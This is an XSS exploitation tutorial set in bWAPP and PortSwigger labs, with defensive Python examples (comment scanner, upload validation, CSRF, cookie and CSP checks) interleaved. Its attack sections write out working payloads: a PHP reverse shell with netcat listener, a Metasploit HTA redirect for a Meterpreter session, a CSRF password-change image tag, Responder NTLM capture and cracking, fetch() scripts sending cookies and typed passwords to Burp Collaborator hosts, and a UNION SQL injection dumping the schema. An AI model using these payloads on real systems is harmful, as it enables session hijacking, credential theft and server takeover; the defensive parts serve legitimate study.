
Cross-Site Scripting Exploitation

Contents
Introduction
Introduction to Cross-Site Scripting
Blind XSS
XSS through File Upload
Reverse Shell with XSS
System Exploitation Over XSS
CSRF with XSS
NTLM Hash Capture with XSS
Session Hijacking with Burp Collaborator Client
  Introducing Burp Collaborator Client
  Inject Blind XSS Payload in Comment Section
  Hijack the Session
Credential Capturing with Burp Collaborator
XSS to SQL Injection


Introduction
"Are you one of those who think that Cross-Site Scripting is only good for a few errors or pop-ups on
the screen?" Yes?? Then in this article you'll see how a web page that suffers from XSS is not only
responsible for the defacement of the web application: it can also violate a visitor's privacy by
handing his login credentials or his authenticated cookies to an attacker without his consent.

I recommend revisiting our previous article for a better understanding before going deeper into the
attack scenarios implemented in this section.

Introduction to Cross-Site Scripting

Cross-Site Scripting is a client-side code injection attack in which malicious scripts are injected into
trusted websites.

In this attack the users are not targeted directly with a payload; instead the attacker exploits the
XSS vulnerability by inserting a malicious script into a web page, where it appears to be a genuine
part of the website. When any user visits that page, the vulnerable web page delivers the malicious
JavaScript code straight to his browser without his knowledge.

XSS is thus classified into three main categories:

• Stored XSS
• Reflected XSS
• DOM-based XSS

I guess you now have a clear picture of what XSS is and how it occurs. So let's try to exploit the
vulnerable labs on the PortSwigger Academy and bWAPP in order to capture the authenticated cookies
of the users and the server's remote shell.

But before we get our hands wet with the exploits, let's understand what Blind XSS is.

Blind XSS
Many times the attacker does not know where the payload will end up, or if and when it will be
executed; there are even times when the injected payload runs in a different environment, i.e. in the
browser of the administrator or of someone else.

So, in order to exploit such vulnerabilities, he blindly deploys a series of malicious payloads into the
web application, and the application stores them in its database. He then waits until a user pulls the
payload out of the database and renders it in his or her browser.

Let's start!!
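Because a blind payload sits in the database until someone renders it, the defender's chance to catch it is at storage time or in a periodic sweep of stored user content. The following is an added example (it is not code from the article or from bWAPP) of such a sweep: a small rule set run over a constructed comments table that contains the payloads used later in this article alongside benign text with angle brackets. It flags records for review; it is not a sanitiser and does not replace output encoding when the content is rendered.

```python
import re
from typing import Dict, List

# Constructed sample of stored user content, as a moderation job or a nightly
# review of the comments table would see it. Records 2, 3, 5 and 6 carry the
# payloads used in this article; the rest are benign text that merely contains
# angle brackets.
STORED_COMMENTS = [
    {"id": 1, "author": "alice", "body": "Nice post, thanks for sharing."},
    {"id": 2, "author": "bob",   "body": '"><img src=x onerror=prompt(1)>'},
    {"id": 3, "author": "carol", "body": "<script>fetch('https://example.burpcollaborator.net',"
                                         "{method:'POST',mode:'no-cors',body:document.cookie});</script>"},
    {"id": 4, "author": "dave",  "body": "Use a < b && b > c to compare the two values."},
    {"id": 5, "author": "eve",   "body": "<script>window.location='http://192.168.0.12:8080/zV9q9x7Tvl0.hta'</script>"},
    {"id": 6, "author": "frank", "body": '<img src="http://192.168.0.14/bWAPP/csrf_1.php?password_new=ignite'
                                         '&password_conf=ignite&action=change">'},
]

# Indicator rules: (name, compiled pattern). They flag content for review; they
# are deliberately broad, so a human or a second stage decides what to do.
RULES = [
    ("script_tag",    re.compile(r"<\s*script\b", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("iframe_tag",    re.compile(r"<\s*iframe\b", re.I)),
    ("exfil_call",    re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\s*\(", re.I)),
    ("cookie_access", re.compile(r"document\.cookie", re.I)),
    ("redirect",      re.compile(r"(window|document)\.location\s*=", re.I)),
    ("hta_link",      re.compile(r"\.hta\b", re.I)),
    ("remote_img",    re.compile(r"<\s*img\b[^>]*\bsrc\s*=\s*['\"]?https?://", re.I)),
]


def scan_comment(body: str) -> List[str]:
    """Return the names of the rules that match; an empty list means no indicator."""
    return [name for name, pattern in RULES if pattern.search(body)]


def scan_store(comments: List[Dict]) -> List[Dict]:
    """Scan every record and keep only those that trip at least one rule."""
    findings = []
    for record in comments:
        hits = scan_comment(record["body"])
        if hits:
            findings.append({"id": record["id"], "author": record["author"], "rules": hits})
    return findings


def format_alert(finding: Dict) -> str:
    """One-line summary suitable for a ticket or a SIEM event."""
    return f"comment {finding['id']} by {finding['author']}: {', '.join(finding['rules'])}"


if __name__ == "__main__":
    for finding in scan_store(STORED_COMMENTS):
        print(format_alert(finding))
```

Record 4 shows why the rules key on tags and handlers rather than on bare angle brackets: a comparison operator in plain text must not generate a ticket. Encoded or obfuscated variants will slip past a regex sweep like this, which is why the sweep complements, rather than replaces, context-aware output encoding at render time.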


XSS through File Upload

Web applications somewhere or other allow their users to upload a file, whether it is an image, a
resume, a song, or anything specific. And with every upload, the file name is reflected back on the
screen as it is emitted by the HTML code.

As the name appears back, we can execute any JavaScript code simply by renaming the file so that the
name carries an XSS payload:

"><img src=x onerror=prompt(1)>


Boot back into the bWAPP application, set the "Choose your bug" option to "Unrestricted File Upload",
and this time keep the security level at "High".

Let's now upload our renamed file into the web application by browsing to it in the directory.

Great!! From the above image you can see that our file name is on the screen. So as we hit the Upload
button, the browser executes the embedded JavaScript code and we get the response.


Reverse Shell with XSS

Generating a pop-up or redirecting a user to some other application with an XSS vulnerability seems
more or less harmless. But what if the attacker is able to catch a reverse shell: will it still be
harmless? Let's see how this could be done.

Fire up your Kali terminal and create a PHP reverse-shell payload by copying it from the webshells
directory:

cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/ReverseXSS.php

Now, in order to catch the remote shell, set the $ip variable in the file to the Kali machine's IP.

Back in the vulnerable application, opt for "Unrestricted File Upload" and upload the ReverseXSS.php
file.

Don't forget to copy the uploaded file's URL, i.e. right-click on the Upload button and choose Copy
Link Location.


Great!! We're almost done; time to inject our XSS payload. Now, with the "Choose your bug" option,
opt for XSS – Stored (Blog).

In the comment section, type your JavaScript payload with the file-upload URL.

But wait!! Before hitting the Submit button, let's start our Netcat listener:

nc -lvp 1234

Cool!! From the image below you can see that we are inside our targeted web server.

I'm sure you might be wondering why I made a round trip to capture the reverse shell when I had the
"File Upload" vulnerability open.

Okay!! Think of the situation where you upload the file directly and successfully grab the reverse
shell. But wait!! Inside the victim's network your IP is disclosed and you're almost caught; or what if
your IP address is not whitelisted? Then?

In such a situation, taking the round trip is the preferable option, as you get the reverse connection
into the victim's server through the authorized user.
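Both upload sections above rest on the same two application defects: the client-supplied file name is concatenated into the page unencoded, and the uploaded file is stored under that name with whatever extension the client chose, so a PHP file lands where the web server will execute it. The following added example (not the article's or bWAPP's code; the allow-list of extensions and the character set for names are assumptions for the example) shows the upload handler side of the fix: the name is validated against an allow-list, the file is stored under a server-generated name, and the name shown back to the user is HTML-encoded.

```python
import html
import os
import re
import secrets
from typing import Tuple

# Extensions the application actually needs to accept (assumed allow-list).
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}
# Extensions that must never appear anywhere in the name, even as shell.php.jpg.
EXECUTABLE_SEGMENTS = {"php", "phtml", "phar", "html", "htm", "hta", "js"}
# Characters permitted in the name that is shown back to the user.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 ._-]{0,99}$")


def render_unsafe(filename: str) -> str:
    """bWAPP-style reflection: the raw name is concatenated into the page."""
    return f"<p>Your file <b>{filename}</b> has been uploaded.</p>"


def render_safe(filename: str) -> str:
    """Same message, but the name is HTML-encoded, so '<' and '\"' become text."""
    return f"<p>Your file <b>{html.escape(filename, quote=True)}</b> has been uploaded.</p>"


def validate_upload(filename: str) -> Tuple[bool, str, str]:
    """Return (accepted, reason, storage_name).

    The client-supplied name is only ever used for display; the file is stored
    under a server-generated name with the validated extension, so a name like
    ReverseXSS.php cannot land on disk as something the web server executes.
    """
    # Path components supplied by the client are discarded outright.
    base = os.path.basename(filename.replace("\\", "/"))
    if not SAFE_NAME.match(base):
        return False, "name contains characters outside the allowed set", ""
    if "." not in base:
        return False, "missing extension", ""
    segments = base.split(".")
    ext = segments[-1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} is not allowed", ""
    if any(seg.lower() in EXECUTABLE_SEGMENTS for seg in segments[1:-1]):
        return False, "nested executable extension", ""
    return True, "ok", f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    for name in ['"><img src=x onerror=prompt(1)>.png', "ReverseXSS.php", "holiday photo.jpg"]:
        print(name, "->", validate_upload(name))
    print(render_safe('"><img src=x onerror=prompt(1)>'))
```

The two layers are independent on purpose: the name check rejects the payload file name before it is stored, and the encoding in render_safe protects the page even if a name with special characters reaches it by another route. Storing under a random name, in a directory the web server does not execute scripts from, is what removes the reverse-shell case regardless of what the extension check missed.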

System Exploitation Over XSS

In the last section we captured the reverse shell, but what if, rather than the server's shell, the
attacker manages to get a Meterpreter session on the machine of the visitor who surfs this vulnerable
web page?


Let's check out how. To make it clearer, we have:

Attacker's machine: Kali Linux

Vulnerable web application: bWAPP (bee-box)

Visitor's machine: Windows

So the attacker first creates an .hta file, i.e. an HTML Application, with the Metasploit framework;
when opened by the victim, it executes a payload via PowerShell.

use exploit/windows/misc/hta_server
set srvhost 192.168.0.12
exploit

Great!! He got the payload URL; now he simply embeds it into the XSS-vulnerable web page and waits
for the visitor.

<script>window.location='http://192.168.0.12:8080/zV9q9x7Tvl0.hta'</script>

Now, whenever a visitor views this web page, the browser executes the malicious script and downloads
the HTA file onto his machine.


Cool!! From the above image you can see that the file has been downloaded onto the system. Now, as
soon as the victim opens it to check what it is, the attacker on the other side gets his Meterpreter
session.

CSRF with XSS

Wouldn't it be great if you were able to change the user's password, or replace the registered email
address with your own, without his consent?

Web applications that suffer from both an XSS and a CSRF vulnerability permit you to do exactly that.

Boot into the vulnerable web application bWAPP as bee:bug, then select "CSRF (Change Password)"
from the "Choose your bug" option.

This selection redirects you to a CSRF-vulnerable web page with an option to change the account
password.


As we enter and set a new password, the submitted value is reflected in the URL as the password is
changed to "12345".

Copy the password URL and change the password_new and password_conf values to the one we want to
set for the visitor. In our case I made it "ignite".

http://192.168.0.14/bWAPP/csrf_1.php?password_new=ignite&password_conf=ignite&action=change

Now it's time to inject our script into the XSS-vulnerable web page with an "image" tag.

<img src="http://192.168.0.14/bWAPP/csrf_1.php?password_new=ignite&password_conf=ignite&action=change">

Now let's consider a visitor who is surfing the website and visits this vulnerable section. As soon as
he does so, the browser loads the embedded payload and the application treats the resulting request
as a genuine request by the visitor, i.e. it changes the password to "ignite".


Great!! He did that; now whenever he tries to log in again with his old password he won't be able to,
as his password has been changed without his consent.

But the attacker can log in to the account, as he has the new password, i.e. "ignite".
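What makes the <img> trick above work is that csrf_1.php accepts a password change from any request that carries the right parameters, including a GET fired by an image tag with the victim's cookies attached automatically. The following added example (not the article's or bWAPP's code; the in-memory session store, the trusted origin and the handler names are assumptions for the example) puts a simulation of that handler next to a hardened one that accepts POST only, pins the Origin header, checks a per-session synchronizer token in constant time, and requires the current password. One caveat the article's scenario makes important: a script injected through XSS on the same origin can read the token from the page and send a POST with a valid Origin, so the token defeats the image tag but not the XSS; the current-password requirement is the control that still holds in that case, and the XSS itself must be fixed.

```python
import hmac
import secrets
from typing import Dict, Optional

# In-memory session store standing in for the application's server-side sessions
# (assumed; bWAPP itself uses PHP sessions).
SESSIONS: Dict[str, Dict[str, str]] = {}
TRUSTED_ORIGIN = "http://192.168.0.14"   # the application's own origin


def _eq(a: str, b: str) -> bool:
    """Constant-time comparison that tolerates non-ASCII input."""
    return hmac.compare_digest(a.encode("utf-8"), b.encode("utf-8"))


def new_session(user: str, password: str) -> str:
    """Create a logged-in session with a fresh per-session CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "password": password,
                     "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """What the server embeds as a hidden field in the real change-password form."""
    return SESSIONS[sid]["csrf"]


def change_password_unsafe(method: str, params: Dict[str, str], sid: str) -> bool:
    """csrf_1.php as the article describes it: any request carrying the parameters
    changes the password, including a GET that an <img src=...> tag triggers."""
    if params.get("action") != "change":
        return False
    if params.get("password_new") != params.get("password_conf"):
        return False
    SESSIONS[sid]["password"] = params["password_new"]
    return True


def change_password_safe(method: str, params: Dict[str, str], sid: str,
                         origin: Optional[str]) -> bool:
    """Hardened handler: POST only, Origin pinned, synchronizer token compared in
    constant time, current password required, token rotated after use."""
    session = SESSIONS.get(sid)
    if session is None or method != "POST":
        return False
    if origin != TRUSTED_ORIGIN:
        return False
    if not _eq(params.get("csrf_token", ""), session["csrf"]):
        return False
    if not _eq(params.get("password_current", ""), session["password"]):
        return False
    new, conf = params.get("password_new", ""), params.get("password_conf", "")
    if not new or new != conf:
        return False
    session["password"] = new
    session["csrf"] = secrets.token_urlsafe(32)
    return True


if __name__ == "__main__":
    # The forged request the <img> tag produces: a GET with no token, no current password.
    forged = {"password_new": "ignite", "password_conf": "ignite", "action": "change"}
    sid = new_session("bee", "bug")
    print("unsafe handler accepted forged GET:", change_password_unsafe("GET", forged, sid))
    sid = new_session("bee", "bug")
    print("safe handler accepted forged GET:", change_password_safe("GET", forged, sid, TRUSTED_ORIGIN))
```

SameSite=Lax on the session cookie adds a browser-side layer for the cross-site case, but it does not help against a request originating from the vulnerable site itself, which is exactly where the article plants the image tag.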


NTLM Hash Capture with XSS

An XSS vulnerability is often known for its pop-ups, but sometimes the attacker manipulates these
pop-ups in order to capture sensitive data of the users, i.e. session cookies, account credentials or
whatever he wishes.

Here the attacker tries to capture the NTLM hashes of the visitors by injecting his malicious
JavaScript code into the vulnerable application.

In order to carry this out, he starts "Responder" on his attacking machine, which will capture all the
NTLM authentication hashes:

responder -I eth0

Further, he simply injects his malicious script into the XSS-vulnerable web page with an "iframe":


<iframe src=http://192.168.0.12/scriptlet.html <

Cool!! It's time to wait for the visitor. Now, as the visitor visits this web page, he encounters a
pop-up asking for credentials.


As soon as he enters his system credentials, the web page reloads and the attacker has his NTLM
hash.

That's not the end; he needs to crack it. Therefore, in a new terminal, he moves to the directory
where the hash is stored:

cd /usr/share/responder/logs

Further, he creates a new password file, "pass.txt".

Great!! His work is done now. He simply feeds the password file and the hash file to "John the
Ripper", and there he recovers the password.

john --wordlist=pass.txt HTTP-NTLMv2-192.168.0.9.txt


Session Hijacking with Burp Collaborator Client

In our previous article we were stealing cookies and impersonating an authenticated user, with our
Netcat listener "ON" on one side while on the other side we logged in as a genuine user.

But in real-life scenarios things don't work this way; there are times when we face blind XSS, i.e. we
don't know when our payload will be executed.

Introducing Burp Collaborator Client

So, in order to exploit this blind XSS vulnerability, let's check out one of the best Burp Suite tools,
the "Burp Collaborator Client".

Don't know what Burp Collaborator is? Follow this section, and I'm sure you'll get the basic
knowledge about it.

Log in to the PortSwigger Academy, scroll down to Cross-Site Scripting, go into "Exploiting cross-site
scripting vulnerabilities", choose the first lab, "Exploiting cross-site scripting to steal cookies", and
hit the "Access the lab" button.

You'll now be redirected to a blog. To go further, I opened a post there and checked out its content.

While scrolling down, at the bottom I found a comment section that seems to have multiple input
fields, i.e. there is a chance that an XSS vulnerability exists here.


Now it's time to bring the "Burp Collaborator Client" into the picture. Open Burp Suite, and on the
left-hand side click on "Burp", then opt for "Burp Collaborator Client".

In the Collaborator Client window, at the "Generate Collaborator payloads" section, hit the Copy to
clipboard button, which copies a payload for you.


Inject Blind XSS Payload in Comment Section

Cool!! Now, come back to the comment section of the blog and enter the following script with your
Burp Collaborator payload:

<script>
fetch('https://qgafu1gvgx5psspo9o4iz1e2ttzond.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

Great!! From the image below you can see that our comment has been posted successfully.


Time to wait!! Click on the Poll button in order to grab the payload-interaction result.

Oops!! We got a long list; select the HTTP one and check its "Response". From the image below you
can see that in the response section we've got a "Session Id". Copy it for now!!

Hijack the Session

Now, back in the browser, configure your proxy and in Burp Suite turn Intercept "ON".

Reload the page and check the intercepted request.


Great!! We have a session ID here too; simply replace it with the one we copied earlier from the
Collaborator.

Hit the Forward button and check what the web application offers you.
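The payload in this section only works because the session cookie is exposed to script through document.cookie. The following added example (not the article's, the lab's or Burp's code; the cookie name and value are constructed) audits a Set-Cookie header for the attributes that close that path, and builds one that passes: HttpOnly keeps the value out of document.cookie, Secure and SameSite limit where it travels, and the __Host- prefix stops a subdomain from overwriting it. HttpOnly does not stop an injected script from making authenticated requests from the victim's own browser, so it limits the blast radius of the XSS rather than removing it.

```python
from typing import Dict, List


def parse_set_cookie(header: str) -> Dict[str, str]:
    """Split a Set-Cookie header value into its attributes with lower-cased keys.
    The cookie's own name=value pair is kept under the key '__pair__'."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    attrs = {"__pair__": parts[0]}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    return attrs


def audit_session_cookie(header: str) -> List[str]:
    """Return the weaknesses found in a session cookie; empty means it passes."""
    attrs = parse_set_cookie(header)
    name = attrs["__pair__"].split("=", 1)[0]
    issues = []
    if "httponly" not in attrs:
        issues.append("missing HttpOnly: readable via document.cookie")
    if "secure" not in attrs:
        issues.append("missing Secure: sent over plain HTTP")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        issues.append("SameSite not Lax or Strict")
    if not name.startswith("__Host-"):
        issues.append("no __Host- prefix: subdomains can overwrite it")
    return issues


def build_session_cookie(value: str, max_age: int = 3600) -> str:
    """Set-Cookie value that passes the audit above. __Host- requires Secure,
    Path=/ and no Domain attribute, which is exactly what is emitted here."""
    return (f"__Host-session={value}; Path=/; Max-Age={max_age}; "
            "Secure; HttpOnly; SameSite=Lax")


def readable_by_script(header: str) -> bool:
    """Would a fetch(..., body: document.cookie) payload see this cookie?"""
    return "httponly" not in parse_set_cookie(header)


if __name__ == "__main__":
    # Constructed examples: a cookie set the way many frameworks do by default,
    # and the hardened equivalent.
    for header in ["session=8f1e2c9ab0; Path=/", build_session_cookie("8f1e2c9ab0")]:
        print(header)
        print("  readable by script:", readable_by_script(header))
        for issue in audit_session_cookie(header):
            print("  -", issue)
```

Rotating the session identifier on login and on privilege change belongs alongside these flags: it does not stop theft, but it shortens the window in which a copied identifier stays valid.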


Credential Capturing with Burp Collaborator

Why capture session cookies if you could get the usernames and passwords directly??

As in the section above, it's not necessary that our payload executes at the same place where it was
injected.

Let's try to capture some credentials in a real-life-style situation, where the web page suffers from a
stored XSS vulnerability.

Back in the PortSwigger account, choose the next lab, "Exploiting cross-site scripting to capture
passwords".

As we hit "Access the lab", we get redirected to the XSS-vulnerable web page. To go further, I again
opened a blog post there.


Scrolling the page again, I encountered the same comment section. Let's exploit it again.

Back in "Burp Collaborator", let's copy the payload again by hitting "Copy to clipboard".

That payload is all we needed; now inject the comment field with the following XSS payload.

<input name=username id=username>


<input type=password name=password
onchange="if(this.value.length)fetch('https://5iojzt7m7e9217idp6s700vah1nsbh.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">


Let's hit "Post Comment" to check whether it is working or not. The image below shows that our
comment has been posted successfully.

Now let's wait in the Burp Collaborator for the results. From the image below you can see that our
payload was executed at some point.

Let's check who did that.


Oops!! It's the administrator; we have some credentials.

But where could we use them?

At the top of the blog there was an account login section; let's check it there.

Cool!! Let's try a dry run here. Turn on your proxy and capture the outgoing HTTP request.


Okay!! Let's replace the username and password with the ones we captured earlier in the Burp
Collaborator.

Great!! Now simply hit the Forward button and there you go....
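The injected form in this section needs two things from the browser: permission to run the inline onchange handler, and permission to fetch() to a host outside the application. A Content-Security-Policy denies both, which is why it is the standard second line behind output encoding. The following added example (not the article's, the lab's or Burp's code; the site origin, the policy and the simplified source-matching rules are assumptions for the example) builds such a policy and evaluates whether a given request would be allowed under it, so that a policy can be reviewed against the exfiltration host before it ships. The matcher covers 'none', 'self', scheme sources and host sources with a leading wildcard; it ignores ports and paths, which can only make it stricter than a browser.

```python
from typing import Dict, List
from urllib.parse import urlsplit

# Origin of the application (assumed for the example).
SITE_ORIGIN = "https://blog.example"

# Directives that do not fall back to default-src when absent.
NO_FALLBACK = {"form-action", "base-uri", "frame-ancestors"}


def build_csp() -> str:
    """Policy with no inline script and no connections or form posts off-site."""
    return ("default-src 'self'; script-src 'self'; connect-src 'self'; "
            "form-action 'self'; img-src 'self' data:; object-src 'none'; "
            "base-uri 'self'; frame-ancestors 'none'")


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Map each directive name to its list of source expressions."""
    policy: Dict[str, List[str]] = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def _source_matches(source: str, url: str, site_origin: str) -> bool:
    target, site = urlsplit(url), urlsplit(site_origin)
    if source == "'none'":
        return False
    if source == "'self'":
        return (target.scheme, target.netloc) == (site.scheme, site.netloc)
    if source.endswith(":"):                        # scheme source such as data:
        return target.scheme == source[:-1]
    scheme, _, host_expr = source.rpartition("://")
    if scheme and target.scheme != scheme:
        return False
    host_expr = host_expr.split("/")[0].split(":")[0].lower()
    host = (target.hostname or "").lower()
    if host_expr.startswith("*."):
        return host.endswith(host_expr[1:]) and host != host_expr[2:]
    return host == host_expr


def csp_allows(policy: Dict[str, List[str]], directive: str, url: str,
               site_origin: str = SITE_ORIGIN) -> bool:
    """Would a request governed by `directive` to `url` be permitted?"""
    sources = policy.get(directive)
    if sources is None and directive not in NO_FALLBACK:
        sources = policy.get("default-src")
    if sources is None:
        return True             # nothing declared: the browser does not restrict it
    return any(_source_matches(s, url, site_origin) for s in sources)


def allows_inline_script(policy: Dict[str, List[str]]) -> bool:
    """Would an inline handler such as onchange="..." be executed?"""
    sources = policy.get("script-src")
    if sources is None:
        sources = policy.get("default-src")
    if sources is None:
        return True
    return "'unsafe-inline'" in sources


if __name__ == "__main__":
    policy = parse_csp(build_csp())
    collab = "https://5iojzt7m7e9217idp6s700vah1nsbh.burpcollaborator.net"
    print("fetch to collaborator host allowed:", csp_allows(policy, "connect-src", collab))
    print("inline onchange handler allowed:   ", allows_inline_script(policy))
```

Policies that keep 'unsafe-inline' for convenience, or that list a wildcard host in connect-src, re-open exactly the two paths this payload uses; the evaluator makes that visible before the header is deployed.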


XSS to SQL Injection

Up till now we have only discussed how an attacker could capture the authenticated cookies, the
visitor's credentials and even the server's remote shell. But what if I say that he can even dump the
complete database of the web application in a single pop-up? Wonder how? Let's find out in this
section.

In the vulnerable application, the attacker encountered a web page that suffers from a SQL injection
vulnerability.

Therefore, in order to get a more precise result, he checked the total number of columns with the
"order by" clause:

http://192.168.0.14/bWAPP/sqli_1.php?title=' order by 7--+&action=search


Once he had confirmed the total number of columns, he used the UNION operator with a SELECT
query:

http://192.168.0.14/bWAPP/sqli_1.php?title=' union select 1,2,3,4,5,6,7--+&action=search

Great!! This was all he wanted: the printed value. From the above image you can see that "2" has
been displayed on the screen.

It's time to check this for XSS. He can't inject his JavaScript code the way he used to, therefore he
converts it all into a hex string and replaces "2" with the hex value:

0x3c7363726970743e616c657274282253514c20496e6a656374696f6e207669612058535322293c2f7363726970743e


Cool!! It's working. Now he can add any script, whether for cookie capturing or for the remote shell.
But this time he'll dump the database, its tables and its fields:

http://192.168.0.14/bWAPP/sqli_1.php?title=%27%20union%20select%201,concat(0x3c7363726970743e616c657274282249474e49544520544543484e4f4c4f47494553,0x5c6e,(concat(@x:=0x00,(SELECT%20count(*)from%20information_schema.columns%20where%20table_schema=database()%20and%20@x:=concat(@x,0x5c6e,database(),0x20207c2020,table_name,0x20207c2020,column_name)),@x)),0x22293c2f7363726970743e),3,4,5,6,7--+&action=search


Great!! From the image below you can see that the complete database structure has been presented
in front of us.

To learn more about website hacking, follow this link.
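The chain in this section needs two defects at once: the title parameter is pasted into the SQL text, so a quote ends the string and UNION appends attacker-chosen columns; and the selected column is written into the page unencoded, so a hex literal that decodes to a script tag is executed instead of displayed. The following added example (not the article's or bWAPP's code; the in-memory SQLite table and its two rows are constructed to mirror the seven-column movies table the "order by 7" probe reveals) shows the string-built query beside the parameterised one with the same input, plus output encoding on every cell. SQLite is used so it runs offline; bWAPP is backed by MySQL, and the comment sequence differs there (the article's --+ versus a bare -- here), but the mechanism is the same.

```python
import html
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the movies table; rows are constructed for the example."""
    con = sqlite3.connect(":memory:")
    con.execute("""CREATE TABLE movies (id INTEGER, title TEXT, release_year INTEGER,
                   genre TEXT, main_character TEXT, imdb TEXT, tickets_stock INTEGER)""")
    con.executemany("INSERT INTO movies VALUES (?,?,?,?,?,?,?)", [
        (1, "Iron Man", 2008, "action", "Tony Stark", "tt0371746", 53),
        (2, "The Incredible Hulk", 2008, "action", "Bruce Banner", "tt0800080", 51),
    ])
    return con


def search_unsafe(con: sqlite3.Connection, title: str) -> List[Tuple]:
    """String-built query of the kind sqli_1.php runs: the input becomes SQL text."""
    return con.execute(f"SELECT * FROM movies WHERE title LIKE '%{title}%'").fetchall()


def search_safe(con: sqlite3.Connection, title: str) -> List[Tuple]:
    """Parameterised query: the input is only ever a value, never SQL text."""
    return con.execute("SELECT * FROM movies WHERE title LIKE ?",
                       (f"%{title}%",)).fetchall()


def render_rows(rows: List[Tuple]) -> str:
    """Output encoding on every cell, so a value that is a <script> tag (whether
    stored in the table or union-injected as a hex literal) is shown as text."""
    return "".join(
        "<tr>" + "".join(f"<td>{html.escape(str(cell))}</td>" for cell in row) + "</tr>"
        for row in rows
    )


if __name__ == "__main__":
    con = make_db()
    probe = "' union select 1,2,3,4,5,6,7--"
    print("unsafe:", search_unsafe(con, probe))   # includes the injected (1,...,7) row
    print("safe:  ", search_safe(con, probe))     # no title contains that literal text
    print(render_rows([(1, "<script>alert(1)</script>", 2, 3, 4, 5, 6)]))
```

The parameterised query removes the injection, and the encoding removes the XSS that the injection was used to deliver; each fix stands on its own, and both are needed for the page to be safe against the full chain shown above.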

www.ignitetechnologies.in
